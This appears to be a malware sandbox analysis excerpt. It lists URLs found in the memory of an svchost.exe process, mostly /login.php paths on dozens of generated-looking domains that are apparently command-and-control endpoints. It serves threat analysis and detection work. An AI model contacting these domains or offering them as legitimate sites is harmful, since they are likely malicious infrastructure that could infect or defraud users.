Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036477488.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036078915.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2054890780.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055126343.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycul.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purygiv.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996165263.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjil.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymuq.com/login.php
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266499150.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purypol.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytov.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywop.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063935893.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxag.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339528056.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282936246.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356165238.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349329564.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357964934.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybeg.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2418245209.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462483307.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvycip.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydov.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyq.com/login.php
Source: svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjyl.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564957391.000000000B5A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559852805.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylep.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyliv.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymug.com/H
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvypoq.com/login.php
Source: svchost.exe, 00000002.00000003.2033528164.00000000066AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040073815.00000000066AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvytag.com/H
Source: svchost.exe, 00000002.00000003.1793087663.000000000662E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790880337.000000000662C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/H
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266499150.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywav.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvywup.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybep.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzybil.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/http://puzygyl.com/http://lymywad.com/H
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602500488.00000000066BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576944755.00000000066BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygyl.com/login.phpl
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559852805.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjov.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymev.com/login.php
Source: svchost.exe, 00000002.00000003.2564959910.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564961073.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymup.com/http://puzymup.com/H
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypug.com/login.php
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/P
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1357846659.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywel.com/h
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfav.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuq.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899745892.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykap.com/login.php
